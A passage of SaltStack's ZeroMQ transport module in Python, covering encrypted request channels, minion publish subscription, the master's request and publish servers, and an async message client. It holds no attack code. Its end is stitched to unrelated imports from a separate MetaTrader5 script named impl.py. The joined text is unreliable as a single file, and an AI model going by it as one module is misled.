self._package_load(self.auth.crypticle.dumps(load)),
timeout=timeout,
tries=tries,
)
if HAS_M2:
aes = key.private_decrypt(ret["key"], RSA.pkcs1_oaep_padding)
else:
cipher = PKCS1_OAEP.new(key)
aes = cipher.decrypt(ret["key"])
pcrypt = salt.crypt.Crypticle(self.opts, aes)
data = pcrypt.loads(ret[dictkey])
if six.PY3:
data = salt.transport.frame.decode_embedded_strs(data)
raise salt.ext.tornado.gen.Return(data)
@salt.ext.tornado.gen.coroutine
def _crypted_transfer(self, load, tries=3, timeout=60, raw=False):
"""
Send a load across the wire, with encryption
In case of authentication errors, try to renegotiate authentication
and retry the method.
Indeed, we can fail too early in case of a master restart during a
minion state execution call
:param dict load: A load to send across the wire
        :param int tries: The number of attempts to make before giving up
:param int timeout: The number of seconds on a response before failing
"""
@salt.ext.tornado.gen.coroutine
def _do_transfer():
# Yield control to the caller. When send() completes, resume by populating data with the Future.result
data = yield self.message_client.send(
self._package_load(self.auth.crypticle.dumps(load)),
timeout=timeout,
tries=tries,
)
            # we may not always have data
# as for example for saltcall ret submission, this is a blind
# communication, we do not subscribe to return events, we just
# upload the results to the master
if data:
data = self.auth.crypticle.loads(data, raw)
if six.PY3 and not raw:
data = salt.transport.frame.decode_embedded_strs(data)
raise salt.ext.tornado.gen.Return(data)
if not self.auth.authenticated:
# Return control back to the caller, resume when authentication succeeds
yield self.auth.authenticate()
try:
            # Attempt the transfer; on an authentication error, re-auth and retry once below.
ret = yield _do_transfer()
except salt.crypt.AuthenticationError:
# If auth error, return control back to the caller, continue when authentication succeeds
yield self.auth.authenticate()
ret = yield _do_transfer()
raise salt.ext.tornado.gen.Return(ret)
@salt.ext.tornado.gen.coroutine
def _uncrypted_transfer(self, load, tries=3, timeout=60):
"""
Send a load across the wire in cleartext
:param dict load: A load to send across the wire
        :param int tries: The number of attempts to make before giving up
:param int timeout: The number of seconds on a response before failing
"""
ret = yield self.message_client.send(
self._package_load(load), timeout=timeout, tries=tries,
)
raise salt.ext.tornado.gen.Return(ret)
@salt.ext.tornado.gen.coroutine
def send(self, load, tries=3, timeout=60, raw=False):
"""
Send a request, return a future which will complete when we send the message
"""
if self.crypt == "clear":
ret = yield self._uncrypted_transfer(load, tries=tries, timeout=timeout)
else:
ret = yield self._crypted_transfer(
load, tries=tries, timeout=timeout, raw=raw
)
raise salt.ext.tornado.gen.Return(ret)
class AsyncZeroMQPubChannel(
salt.transport.mixins.auth.AESPubClientMixin, salt.transport.client.AsyncPubChannel
):
"""
A transport channel backed by ZeroMQ for a Salt Publisher to use to
publish commands to connected minions
"""
def __init__(self, opts, **kwargs):
self.opts = opts
self.ttype = "zeromq"
self.io_loop = kwargs.get("io_loop")
if self.io_loop is None:
install_zmq()
self.io_loop = ZMQDefaultLoop.current()
self.hexid = hashlib.sha1(
salt.utils.stringutils.to_bytes(self.opts["id"])
).hexdigest()
self.auth = salt.crypt.AsyncAuth(self.opts, io_loop=self.io_loop)
self.serial = salt.payload.Serial(self.opts)
self.context = zmq.Context()
self._socket = self.context.socket(zmq.SUB)
if self.opts["zmq_filtering"]:
# TODO: constants file for "broadcast"
self._socket.setsockopt(zmq.SUBSCRIBE, b"broadcast")
if self.opts.get("__role") == "syndic":
self._socket.setsockopt(zmq.SUBSCRIBE, b"syndic")
else:
self._socket.setsockopt(
zmq.SUBSCRIBE, salt.utils.stringutils.to_bytes(self.hexid)
)
else:
self._socket.setsockopt(zmq.SUBSCRIBE, b"")
self._socket.setsockopt(
zmq.IDENTITY, salt.utils.stringutils.to_bytes(self.opts["id"])
)
# TODO: cleanup all the socket opts stuff
if hasattr(zmq, "TCP_KEEPALIVE"):
self._socket.setsockopt(zmq.TCP_KEEPALIVE, self.opts["tcp_keepalive"])
self._socket.setsockopt(
zmq.TCP_KEEPALIVE_IDLE, self.opts["tcp_keepalive_idle"]
)
self._socket.setsockopt(
zmq.TCP_KEEPALIVE_CNT, self.opts["tcp_keepalive_cnt"]
)
self._socket.setsockopt(
zmq.TCP_KEEPALIVE_INTVL, self.opts["tcp_keepalive_intvl"]
)
recon_delay = self.opts["recon_default"]
if self.opts["recon_randomize"]:
recon_delay = randint(
self.opts["recon_default"],
self.opts["recon_default"] + self.opts["recon_max"],
)
log.debug(
"Generated random reconnect delay between '%sms' and '%sms' (%s)",
self.opts["recon_default"],
self.opts["recon_default"] + self.opts["recon_max"],
recon_delay,
)
log.debug("Setting zmq_reconnect_ivl to '%sms'", recon_delay)
self._socket.setsockopt(zmq.RECONNECT_IVL, recon_delay)
if hasattr(zmq, "RECONNECT_IVL_MAX"):
log.debug(
"Setting zmq_reconnect_ivl_max to '%sms'",
self.opts["recon_default"] + self.opts["recon_max"],
)
self._socket.setsockopt(zmq.RECONNECT_IVL_MAX, self.opts["recon_max"])
if (self.opts["ipv6"] is True or ":" in self.opts["master_ip"]) and hasattr(
zmq, "IPV4ONLY"
):
# IPv6 sockets work for both IPv6 and IPv4 addresses
self._socket.setsockopt(zmq.IPV4ONLY, 0)
if HAS_ZMQ_MONITOR and self.opts["zmq_monitor"]:
self._monitor = ZeroMQSocketMonitor(self._socket)
self._monitor.start_io_loop(self.io_loop)
def close(self):
if hasattr(self, "_monitor") and self._monitor is not None:
self._monitor.stop()
self._monitor = None
if hasattr(self, "_stream"):
if ZMQ_VERSION_INFO < (14, 3, 0):
# stream.close() doesn't work properly on pyzmq < 14.3.0
self._stream.io_loop.remove_handler(self._stream.socket)
self._stream.socket.close(0)
else:
self._stream.close(0)
elif hasattr(self, "_socket"):
self._socket.close(0)
if hasattr(self, "context") and self.context.closed is False:
self.context.term()
def destroy(self):
        # Backwards compat
salt.utils.versions.warn_until(
"Sodium",
"Calling {0}.destroy() is deprecated. Please call {0}.close() instead.".format(
self.__class__.__name__
),
stacklevel=3,
)
self.close()
# pylint: disable=W1701
def __del__(self):
self.close()
# pylint: enable=W1701
# TODO: this is the time to see if we are connected, maybe use the req channel to guess?
@salt.ext.tornado.gen.coroutine
def connect(self):
if not self.auth.authenticated:
yield self.auth.authenticate()
# if this is changed from the default, we assume it was intentional
if int(self.opts.get("publish_port", 4506)) != 4506:
self.publish_port = self.opts.get("publish_port")
# else take the relayed publish_port master reports
else:
self.publish_port = self.auth.creds["publish_port"]
log.debug(
"Connecting the Minion to the Master publish port, using the URI: %s",
self.master_pub,
)
self._socket.connect(self.master_pub)
@property
def master_pub(self):
"""
Return the master publish port
"""
return _get_master_uri(
self.opts["master_ip"],
self.publish_port,
source_ip=self.opts.get("source_ip"),
source_port=self.opts.get("source_publish_port"),
)
@salt.ext.tornado.gen.coroutine
def _decode_messages(self, messages):
"""
Take the zmq messages, decrypt/decode them into a payload
:param list messages: A list of messages to be decoded
"""
messages_len = len(messages)
        # if it was one message, then it's old style
if messages_len == 1:
payload = self.serial.loads(messages[0])
# 2 includes a header which says who should do it
elif messages_len == 2:
message_target = salt.utils.stringutils.to_str(messages[0])
if (
self.opts.get("__role") != "syndic"
and message_target not in ("broadcast", self.hexid)
) or (
self.opts.get("__role") == "syndic"
and message_target not in ("broadcast", "syndic")
):
log.debug("Publish received for not this minion: %s", message_target)
raise salt.ext.tornado.gen.Return(None)
payload = self.serial.loads(messages[1])
else:
            raise Exception(
                (
                    "Invalid number of messages ({0}) in zeromq pub "
                    "message from master"
                ).format(messages_len)
            )
# Yield control back to the caller. When the payload has been decoded, assign
# the decoded payload to 'ret' and resume operation
ret = yield self._decode_payload(payload)
raise salt.ext.tornado.gen.Return(ret)
@property
def stream(self):
"""
Return the current zmqstream, creating one if necessary
"""
if not hasattr(self, "_stream"):
self._stream = zmq.eventloop.zmqstream.ZMQStream(
self._socket, io_loop=self.io_loop
)
return self._stream
def on_recv(self, callback):
"""
Register a callback for received messages (that we didn't initiate)
:param func callback: A function which should be called when data is received
"""
if callback is None:
return self.stream.on_recv(None)
@salt.ext.tornado.gen.coroutine
def wrap_callback(messages):
payload = yield self._decode_messages(messages)
if payload is not None:
callback(payload)
return self.stream.on_recv(wrap_callback)
class ZeroMQReqServerChannel(
salt.transport.mixins.auth.AESReqServerMixin, salt.transport.server.ReqServerChannel
):
def __init__(self, opts):
salt.transport.server.ReqServerChannel.__init__(self, opts)
self._closing = False
def zmq_device(self):
"""
Multiprocessing target for the zmq queue device
"""
self.__setup_signals()
salt.utils.process.appendproctitle("MWorkerQueue")
self.context = zmq.Context(self.opts["worker_threads"])
# Prepare the zeromq sockets
self.uri = "tcp://{interface}:{ret_port}".format(**self.opts)
self.clients = self.context.socket(zmq.ROUTER)
if self.opts["ipv6"] is True and hasattr(zmq, "IPV4ONLY"):
# IPv6 sockets work for both IPv6 and IPv4 addresses
self.clients.setsockopt(zmq.IPV4ONLY, 0)
self.clients.setsockopt(zmq.BACKLOG, self.opts.get("zmq_backlog", 1000))
self._start_zmq_monitor()
self.workers = self.context.socket(zmq.DEALER)
if self.opts.get("ipc_mode", "") == "tcp":
self.w_uri = "tcp://127.0.0.1:{0}".format(
self.opts.get("tcp_master_workers", 4515)
)
else:
self.w_uri = "ipc://{0}".format(
os.path.join(self.opts["sock_dir"], "workers.ipc")
)
log.info("Setting up the master communication server")
self.clients.bind(self.uri)
self.workers.bind(self.w_uri)
while True:
if self.clients.closed or self.workers.closed:
break
try:
zmq.device(zmq.QUEUE, self.clients, self.workers)
except zmq.ZMQError as exc:
if exc.errno == errno.EINTR:
continue
six.reraise(*sys.exc_info())
except (KeyboardInterrupt, SystemExit):
break
def close(self):
"""
Cleanly shutdown the router socket
"""
if self._closing:
return
log.info("MWorkerQueue under PID %s is closing", os.getpid())
self._closing = True
# pylint: disable=E0203
if getattr(self, "_monitor", None) is not None:
self._monitor.stop()
self._monitor = None
if getattr(self, "_w_monitor", None) is not None:
self._w_monitor.stop()
self._w_monitor = None
if hasattr(self, "clients") and self.clients.closed is False:
self.clients.close()
if hasattr(self, "workers") and self.workers.closed is False:
self.workers.close()
if hasattr(self, "stream"):
self.stream.close()
if hasattr(self, "_socket") and self._socket.closed is False:
self._socket.close()
if hasattr(self, "context") and self.context.closed is False:
self.context.term()
# pylint: enable=E0203
def pre_fork(self, process_manager):
"""
Pre-fork we need to create the zmq router device
:param func process_manager: An instance of salt.utils.process.ProcessManager
"""
salt.transport.mixins.auth.AESReqServerMixin.pre_fork(self, process_manager)
process_manager.add_process(self.zmq_device)
def _start_zmq_monitor(self):
"""
Starts ZMQ monitor for debugging purposes.
:return:
"""
        # Socket monitor shall be used only for debug
# purposes so using threading doesn't look too bad here
if HAS_ZMQ_MONITOR and self.opts["zmq_monitor"]:
log.debug("Starting ZMQ monitor")
import threading
self._w_monitor = ZeroMQSocketMonitor(self._socket)
threading.Thread(target=self._w_monitor.start_poll).start()
            log.debug("ZMQ monitor has been started")
def post_fork(self, payload_handler, io_loop):
"""
After forking we need to create all of the local sockets to listen to the
router
        :param func payload_handler: A function to be called to handle incoming payloads as
they are picked up off the wire
:param IOLoop io_loop: An instance of a Tornado IOLoop, to handle event scheduling
"""
self.payload_handler = payload_handler
self.io_loop = io_loop
self.context = zmq.Context(1)
self._socket = self.context.socket(zmq.REP)
self._start_zmq_monitor()
if self.opts.get("ipc_mode", "") == "tcp":
self.w_uri = "tcp://127.0.0.1:{0}".format(
self.opts.get("tcp_master_workers", 4515)
)
else:
self.w_uri = "ipc://{0}".format(
os.path.join(self.opts["sock_dir"], "workers.ipc")
)
log.info("Worker binding to socket %s", self.w_uri)
self._socket.connect(self.w_uri)
salt.transport.mixins.auth.AESReqServerMixin.post_fork(
self, payload_handler, io_loop
)
self.stream = zmq.eventloop.zmqstream.ZMQStream(
self._socket, io_loop=self.io_loop
)
self.stream.on_recv_stream(self.handle_message)
@salt.ext.tornado.gen.coroutine
def handle_message(self, stream, payload):
"""
Handle incoming messages from underlying TCP streams
        :param ZMQStream stream: A ZeroMQ stream.
See http://zeromq.github.io/pyzmq/api/generated/zmq.eventloop.zmqstream.html
:param dict payload: A payload to process
"""
try:
payload = self.serial.loads(payload[0])
payload = self._decode_payload(payload)
except Exception as exc: # pylint: disable=broad-except
exc_type = type(exc).__name__
if exc_type == "AuthenticationError":
log.debug(
"Minion failed to auth to master. Since the payload is "
"encrypted, it is not known which minion failed to "
"authenticate. It is likely that this is a transient "
"failure due to the master rotating its public key."
)
else:
log.error("Bad load from minion: %s: %s", exc_type, exc)
stream.send(self.serial.dumps("bad load"))
raise salt.ext.tornado.gen.Return()
# TODO helper functions to normalize payload?
if not isinstance(payload, dict) or not isinstance(payload.get("load"), dict):
log.error(
"payload and load must be a dict. Payload was: %s and load was %s",
payload,
payload.get("load"),
)
stream.send(self.serial.dumps("payload and load must be a dict"))
raise salt.ext.tornado.gen.Return()
try:
id_ = payload["load"].get("id", "")
if str("\0") in id_:
log.error("Payload contains an id with a null byte: %s", payload)
stream.send(self.serial.dumps("bad load: id contains a null byte"))
raise salt.ext.tornado.gen.Return()
except TypeError:
log.error("Payload contains non-string id: %s", payload)
stream.send(
self.serial.dumps("bad load: id {0} is not a string".format(id_))
)
raise salt.ext.tornado.gen.Return()
# intercept the "_auth" commands, since the main daemon shouldn't know
# anything about our key auth
if payload["enc"] == "clear" and payload.get("load", {}).get("cmd") == "_auth":
stream.send(self.serial.dumps(self._auth(payload["load"])))
raise salt.ext.tornado.gen.Return()
# TODO: test
try:
# Take the payload_handler function that was registered when we created the channel
# and call it, returning control to the caller until it completes
ret, req_opts = yield self.payload_handler(payload)
except Exception as e: # pylint: disable=broad-except
# always attempt to return an error to the minion
stream.send("Some exception handling minion payload")
log.error("Some exception handling a payload from minion", exc_info=True)
raise salt.ext.tornado.gen.Return()
req_fun = req_opts.get("fun", "send")
if req_fun == "send_clear":
stream.send(self.serial.dumps(ret))
elif req_fun == "send":
stream.send(self.serial.dumps(self.crypticle.dumps(ret)))
elif req_fun == "send_private":
stream.send(
self.serial.dumps(
self._encrypt_private(ret, req_opts["key"], req_opts["tgt"],)
)
)
else:
log.error("Unknown req_fun %s", req_fun)
# always attempt to return an error to the minion
stream.send("Server-side exception handling payload")
raise salt.ext.tornado.gen.Return()
def __setup_signals(self):
signal.signal(signal.SIGINT, self._handle_signals)
signal.signal(signal.SIGTERM, self._handle_signals)
def _handle_signals(self, signum, sigframe):
msg = "{0} received a ".format(self.__class__.__name__)
if signum == signal.SIGINT:
msg += "SIGINT"
elif signum == signal.SIGTERM:
msg += "SIGTERM"
msg += ". Exiting"
log.debug(msg)
self.close()
sys.exit(salt.defaults.exitcodes.EX_OK)
def _set_tcp_keepalive(zmq_socket, opts):
"""
Ensure that TCP keepalives are set as specified in "opts".
Warning: Failure to set TCP keepalives on the salt-master can result in
not detecting the loss of a minion when the connection is lost or when
    its host has been terminated without first closing the socket.
Salt's Presence System depends on this connection status to know if a minion
is "present".
Warning: Failure to set TCP keepalives on minions can result in frequent or
unexpected disconnects!
"""
if hasattr(zmq, "TCP_KEEPALIVE") and opts:
if "tcp_keepalive" in opts:
zmq_socket.setsockopt(zmq.TCP_KEEPALIVE, opts["tcp_keepalive"])
if "tcp_keepalive_idle" in opts:
zmq_socket.setsockopt(zmq.TCP_KEEPALIVE_IDLE, opts["tcp_keepalive_idle"])
if "tcp_keepalive_cnt" in opts:
zmq_socket.setsockopt(zmq.TCP_KEEPALIVE_CNT, opts["tcp_keepalive_cnt"])
if "tcp_keepalive_intvl" in opts:
zmq_socket.setsockopt(zmq.TCP_KEEPALIVE_INTVL, opts["tcp_keepalive_intvl"])
class ZeroMQPubServerChannel(salt.transport.server.PubServerChannel):
"""
Encapsulate synchronous operations for a publisher channel
"""
_sock_data = threading.local()
def __init__(self, opts):
self.opts = opts
self.serial = salt.payload.Serial(self.opts) # TODO: in init?
self.ckminions = salt.utils.minions.CkMinions(self.opts)
def connect(self):
return salt.ext.tornado.gen.sleep(5)
def _publish_daemon(self, log_queue=None):
"""
Bind to the interface specified in the configuration file
"""
salt.utils.process.appendproctitle(self.__class__.__name__)
if log_queue:
salt.log.setup.set_multiprocessing_logging_queue(log_queue)
salt.log.setup.setup_multiprocessing_logging(log_queue)
# Set up the context
context = zmq.Context(1)
# Prepare minion publish socket
pub_sock = context.socket(zmq.PUB)
_set_tcp_keepalive(pub_sock, self.opts)
        # if 2.1 <= zmq < 3.0, we only have one HWM setting
try:
pub_sock.setsockopt(zmq.HWM, self.opts.get("pub_hwm", 1000))
# in zmq >= 3.0, there are separate send and receive HWM settings
except AttributeError:
# Set the High Water Marks. For more information on HWM, see:
# http://api.zeromq.org/4-1:zmq-setsockopt
pub_sock.setsockopt(zmq.SNDHWM, self.opts.get("pub_hwm", 1000))
pub_sock.setsockopt(zmq.RCVHWM, self.opts.get("pub_hwm", 1000))
if self.opts["ipv6"] is True and hasattr(zmq, "IPV4ONLY"):
# IPv6 sockets work for both IPv6 and IPv4 addresses
pub_sock.setsockopt(zmq.IPV4ONLY, 0)
pub_sock.setsockopt(zmq.BACKLOG, self.opts.get("zmq_backlog", 1000))
pub_sock.setsockopt(zmq.LINGER, -1)
pub_uri = "tcp://{interface}:{publish_port}".format(**self.opts)
# Prepare minion pull socket
pull_sock = context.socket(zmq.PULL)
pull_sock.setsockopt(zmq.LINGER, -1)
if self.opts.get("ipc_mode", "") == "tcp":
pull_uri = "tcp://127.0.0.1:{0}".format(
self.opts.get("tcp_master_publish_pull", 4514)
)
else:
pull_uri = "ipc://{0}".format(
os.path.join(self.opts["sock_dir"], "publish_pull.ipc")
)
salt.utils.zeromq.check_ipc_path_max_len(pull_uri)
# Start the minion command publisher
log.info("Starting the Salt Publisher on %s", pub_uri)
pub_sock.bind(pub_uri)
# Securely create socket
log.info("Starting the Salt Puller on %s", pull_uri)
with salt.utils.files.set_umask(0o177):
pull_sock.bind(pull_uri)
try:
while True:
# Catch and handle EINTR from when this process is sent
# SIGUSR1 gracefully so we don't choke and die horribly
try:
log.debug("Publish daemon getting data from puller %s", pull_uri)
package = pull_sock.recv()
log.debug("Publish daemon received payload. size=%d", len(package))
unpacked_package = salt.payload.unpackage(package)
if six.PY3:
unpacked_package = salt.transport.frame.decode_embedded_strs(
unpacked_package
)
payload = unpacked_package["payload"]
log.trace("Accepted unpacked package from puller")
if self.opts["zmq_filtering"]:
# if you have a specific topic list, use that
if "topic_lst" in unpacked_package:
for topic in unpacked_package["topic_lst"]:
log.trace(
"Sending filtered data over publisher %s", pub_uri
)
# zmq filters are substring match, hash the topic
# to avoid collisions
htopic = salt.utils.stringutils.to_bytes(
hashlib.sha1(
salt.utils.stringutils.to_bytes(topic)
).hexdigest()
)
pub_sock.send(htopic, flags=zmq.SNDMORE)
pub_sock.send(payload)
log.trace("Filtered data has been sent")
# Syndic broadcast
if self.opts.get("order_masters"):
log.trace("Sending filtered data to syndic")
pub_sock.send(b"syndic", flags=zmq.SNDMORE)
pub_sock.send(payload)
log.trace("Filtered data has been sent to syndic")
# otherwise its a broadcast
else:
# TODO: constants file for "broadcast"
log.trace(
"Sending broadcasted data over publisher %s", pub_uri
)
pub_sock.send(b"broadcast", flags=zmq.SNDMORE)
pub_sock.send(payload)
log.trace("Broadcasted data has been sent")
else:
log.trace(
"Sending ZMQ-unfiltered data over publisher %s", pub_uri
)
pub_sock.send(payload)
log.trace("Unfiltered data has been sent")
except zmq.ZMQError as exc:
if exc.errno == errno.EINTR:
continue
six.reraise(*sys.exc_info())
except KeyboardInterrupt:
            log.trace("Publish daemon caught Keyboard interrupt, tearing down")
# Cleanly close the sockets if we're shutting down
if pub_sock.closed is False:
pub_sock.close()
if pull_sock.closed is False:
pull_sock.close()
if context.closed is False:
context.term()
def pre_fork(self, process_manager, kwargs=None):
"""
Do anything necessary pre-fork. Since this is on the master side this will
primarily be used to create IPC channels and create our daemon process to
do the actual publishing
:param func process_manager: A ProcessManager, from salt.utils.process.ProcessManager
"""
process_manager.add_process(self._publish_daemon, kwargs=kwargs)
@property
def pub_sock(self):
"""
This thread's zmq publisher socket. This socket is stored on the class
so that multiple instantiations in the same thread will re-use a single
zmq socket.
"""
try:
return self._sock_data.sock
except AttributeError:
pass
def pub_connect(self):
"""
Create and connect this thread's zmq socket. If a publisher socket
already exists "pub_close" is called before creating and connecting a
new socket.
"""
if self.pub_sock:
self.pub_close()
ctx = zmq.Context.instance()
self._sock_data.sock = ctx.socket(zmq.PUSH)
self.pub_sock.setsockopt(zmq.LINGER, -1)
if self.opts.get("ipc_mode", "") == "tcp":
pull_uri = "tcp://127.0.0.1:{0}".format(
self.opts.get("tcp_master_publish_pull", 4514)
)
else:
pull_uri = "ipc://{0}".format(
os.path.join(self.opts["sock_dir"], "publish_pull.ipc")
)
log.debug("Connecting to pub server: %s", pull_uri)
self.pub_sock.connect(pull_uri)
return self._sock_data.sock
def pub_close(self):
"""
Disconnect an existing publisher socket and remove it from the local
thread's cache.
"""
if hasattr(self._sock_data, "sock"):
self._sock_data.sock.close()
delattr(self._sock_data, "sock")
def publish(self, load):
"""
        Publish "load" to minions. This sends the load to the publisher daemon
        process, which does the actual sending to minions.
:param dict load: A load to be sent across the wire to minions
"""
payload = {"enc": "aes"}
crypticle = salt.crypt.Crypticle(
self.opts, salt.master.SMaster.secrets["aes"]["secret"].value
)
payload["load"] = crypticle.dumps(load)
if self.opts["sign_pub_messages"]:
master_pem_path = os.path.join(self.opts["pki_dir"], "master.pem")
log.debug("Signing data packet")
payload["sig"] = salt.crypt.sign_message(master_pem_path, payload["load"])
int_payload = {"payload": self.serial.dumps(payload)}
# add some targeting stuff for lists only (for now)
if load["tgt_type"] == "list":
int_payload["topic_lst"] = load["tgt"]
# If zmq_filtering is enabled, target matching has to happen master side
match_targets = ["pcre", "glob", "list"]
if self.opts["zmq_filtering"] and load["tgt_type"] in match_targets:
# Fetch a list of minions that match
_res = self.ckminions.check_minions(load["tgt"], tgt_type=load["tgt_type"])
match_ids = _res["minions"]
log.debug("Publish Side Match: %s", match_ids)
            # Send the list of minions through so zmq can target them
int_payload["topic_lst"] = match_ids
payload = self.serial.dumps(int_payload)
log.debug(
"Sending payload to publish daemon. jid=%s size=%d",
load.get("jid", None),
len(payload),
)
if not self.pub_sock:
self.pub_connect()
self.pub_sock.send(payload)
log.debug("Sent payload to publish daemon.")
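    # Wire format handed to the publish daemon (sketch): publish() pushes
    # serial.dumps({"payload": <signed/encrypted job>, "topic_lst": [minion ids]}) to
    # pull_uri; _publish_daemon() unpacks it and fans it out on the PUB socket,
    # prefixing a hashed-topic frame (or b"broadcast"/b"syndic") when zmq_filtering is on.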
class AsyncReqMessageClientPool(salt.transport.MessageClientPool):
"""
    Wrapper class around AsyncReqMessageClient to avoid blocking while writing data to the socket.
"""
def __init__(self, opts, args=None, kwargs=None):
super(AsyncReqMessageClientPool, self).__init__(
AsyncReqMessageClient, opts, args=args, kwargs=kwargs
)
self._closing = False
def close(self):
if self._closing:
return
self._closing = True
for message_client in self.message_clients:
message_client.close()
self.message_clients = []
def send(self, *args, **kwargs):
message_clients = sorted(self.message_clients, key=lambda x: len(x.send_queue))
return message_clients[0].send(*args, **kwargs)
def destroy(self):
        # Backwards compat
salt.utils.versions.warn_until(
"Sodium",
"Calling {0}.destroy() is deprecated. Please call {0}.close() instead.".format(
self.__class__.__name__
),
stacklevel=3,
)
self.close()
# pylint: disable=W1701
def __del__(self):
self.close()
# pylint: enable=W1701
# TODO: unit tests!
class AsyncReqMessageClient(object):
"""
This class wraps the underlying zeromq REQ socket and gives a future-based
    interface to sending and receiving messages. This works around the primary
limitation of serialized send/recv on the underlying socket by queueing the
message sends in this class. In the future if we decide to attempt to multiplex
we can manage a pool of REQ/REP sockets-- but for now we'll just do them in serial
"""
def __init__(self, opts, addr, linger=0, io_loop=None):
"""
Create an asynchronous message client
:param dict opts: The salt opts dictionary
        :param str addr: The master address (URI) to connect to
:param int linger: The number of seconds to linger on a ZMQ socket. See
http://api.zeromq.org/2-1:zmq-setsockopt [ZMQ_LINGER]
:param IOLoop io_loop: A Tornado IOLoop event scheduler [tornado.ioloop.IOLoop]
"""
self.opts = opts
self.addr = addr
self.linger = linger
if io_loop is None:
self.io_loop = salt.ext.tornado.ioloop.IOLoop.current()
else:
self.io_loop = io_loop
self.serial = salt.payload.Serial(self.opts)
self.context = zmq.Context()
# wire up sockets
self._init_socket()
self.send_queue = []
# mapping of message -> future
self.send_future_map = {}
self.send_timeout_map = {} # message -> timeout
self._closing = False
# TODO: timeout all in-flight sessions, or error
def close(self):
if self._closing:
return
self._closing = True
if hasattr(self, "stream") and self.stream is not None:
if ZMQ_VERSION_INFO < (14, 3, 0):
# stream.close() doesn't work properly on pyzmq < 14.3.0
if self.stream.socket:
self.stream.socket.close()
self.stream.io_loop.remove_handler(self.stream.socket)
# set this to None, more hacks for messed up pyzmq
self.stream.socket = None
self.socket.close()
else:
self.stream.close()
self.socket = None
self.stream = None
if self.context.closed is False:
self.context.term()
def destroy(self):
# Backwards compat
salt.utils.versions.warn_until(
"Sodium",
"Calling {0}.destroy() is deprecated. Please call {0}.close() instead.".format(
self.__class__.__name__
),
stacklevel=3,
)
self.close()
# pylint: disable=W1701
def __del__(self):
self.close()
# pylint: enable=W1701
def _init_socket(self):
if hasattr(self, "stream"):
self.stream.close() # pylint: disable=E0203
self.socket.close() # pylint: disable=E0203
del self.stream
del self.socket
self.socket = self.context.socket(zmq.REQ)
# socket options
if hasattr(zmq, "RECONNECT_IVL_MAX"):
self.socket.setsockopt(zmq.RECONNECT_IVL_MAX, 5000)
_set_tcp_keepalive(self.socket, self.opts)
if self.addr.startswith("tcp://["):
# Hint PF type if bracket enclosed IPv6 address
if hasattr(zmq, "IPV6"):
self.socket.setsockopt(zmq.IPV6, 1)
elif hasattr(zmq, "IPV4ONLY"):
self.socket.setsockopt(zmq.IPV4ONLY, 0)
self.socket.linger = self.linger
log.debug("Trying to connect to: %s", self.addr)
self.socket.connect(self.addr)
self.stream = zmq.eventloop.zmqstream.ZMQStream(
self.socket, io_loop=self.io_loop
)
@salt.ext.tornado.gen.coroutine
def _internal_send_recv(self):
while len(self.send_queue) > 0:
message = self.send_queue[0]
future = self.send_future_map.get(message, None)
if future is None:
# Timed out; drop the message
del self.send_queue[0]
continue
# send
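# mark_future resolves the pending future with the deserialized reply as soon
# as the REQ socket receives the response for the message just sent.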
def mark_future(msg):
if not future.done():
data = self.serial.loads(msg[0])
future.set_result(data)
self.stream.on_recv(mark_future)
self.stream.send(message)
try:
ret = yield future
except Exception as err: # pylint: disable=broad-except
log.debug("Re-init ZMQ socket: %s", err)
self._init_socket() # re-init the zmq socket (no other way in zmq)
del self.send_queue[0]
continue
del self.send_queue[0]
self.send_future_map.pop(message, None)
self.remove_message_timeout(message)
def remove_message_timeout(self, message):
if message not in self.send_timeout_map:
return
timeout = self.send_timeout_map.pop(message, None)
if timeout is not None:
# Hasn't already timed out
self.io_loop.remove_timeout(timeout)
def timeout_message(self, message):
"""
Handle a message timeout by removing it from the sending queue
and informing the caller
:raises: SaltReqTimeoutError
"""
future = self.send_future_map.pop(message, None)
# In a race condition the message might have been sent by the time
# we're timing it out. Make sure the future is not None
if future is not None:
del self.send_timeout_map[message]
if future.attempts < future.tries:
future.attempts += 1
log.debug(
"SaltReqTimeoutError, retrying. (%s/%s)",
future.attempts,
future.tries,
)
self.send(
message, timeout=future.timeout, tries=future.tries, future=future,
)
else:
future.set_exception(SaltReqTimeoutError("Message timed out"))
def send(
self, message, timeout=None, tries=3, future=None, callback=None, raw=False
):
"""
Return a future which will be completed when the message has a response
"""
if future is None:
future = salt.ext.tornado.concurrent.Future()
future.tries = tries
future.attempts = 0
future.timeout = timeout
# if a future wasn't passed in, we need to serialize the message
message = self.serial.dumps(message)
if callback is not None:
def handle_future(future):
response = future.result()
self.io_loop.add_callback(callback, response)
future.add_done_callback(handle_future)
# Add this future to the mapping
self.send_future_map[message] = future
if self.opts.get("detect_mode") is True:
timeout = 1
if timeout is not None:
send_timeout = self.io_loop.call_later(
timeout, self.timeout_message, message
)
self.send_timeout_map[message] = send_timeout
if len(self.send_queue) == 0:
self.io_loop.spawn_callback(self._internal_send_recv)
self.send_queue.append(message)
return future
class ZeroMQSocketMonitor(object):
__EVENT_MAP = None
def __init__(self, socket):
"""
Create ZMQ monitor sockets
More information:
http://api.zeromq.org/4-0:zmq-socket-monitor
"""
self._socket = socket
self._monitor_socket = self._socket.get_monitor_socket()
self._monitor_stream = None
def start_io_loop(self, io_loop):
log.trace("Event monitor start!")
self._monitor_stream = zmq.eventloop.zmqstream.ZMQStream(
self._monitor_socket, io_loop=io_loop
)
self._monitor_stream.on_recv(self.monitor_callback)
def start_poll(self):
log.trace("Event monitor start!")
try:
while self._monitor_socket is not None and self._monitor_socket.poll():
msg = self._monitor_socket.recv_multipart()
self.monitor_callback(msg)
except (AttributeError, zmq.error.ContextTerminated):
# We cannot log here because we'll get an interrupted system call in trying
# to flush the logging buffer as we terminate
pass
@property
def event_map(self):
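# Lazily build and cache a class-level map from zmq EVENT_* integer values to
# their names so monitor_callback can log human-readable event descriptions.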
if ZeroMQSocketMonitor.__EVENT_MAP is None:
event_map = {}
for name in dir(zmq):
if name.startswith("EVENT_"):
value = getattr(zmq, name)
event_map[value] = name
ZeroMQSocketMonitor.__EVENT_MAP = event_map
return ZeroMQSocketMonitor.__EVENT_MAP
def monitor_callback(self, msg):
evt = zmq.utils.monitor.parse_monitor_message(msg)
evt["description"] = self.event_map[evt["event"]]
log.debug("ZeroMQ event: %s", evt)
if evt["event"] == zmq.EVENT_MONITOR_STOPPED:
self.stop()
def stop(self):
if self._socket is None:
return
self._socket.disable_monitor()
self._socket = None
self._monitor_socket = None
if self._monitor_stream is not None:
self._monitor_stream.close()
self._monitor_stream = None
log.trace("Event monitor done!")
|
impl.py
|
import datetime
import locale
from multiprocessing import *
import os
from threading import *
from time import sleep
import MetaTrader5 as mt5
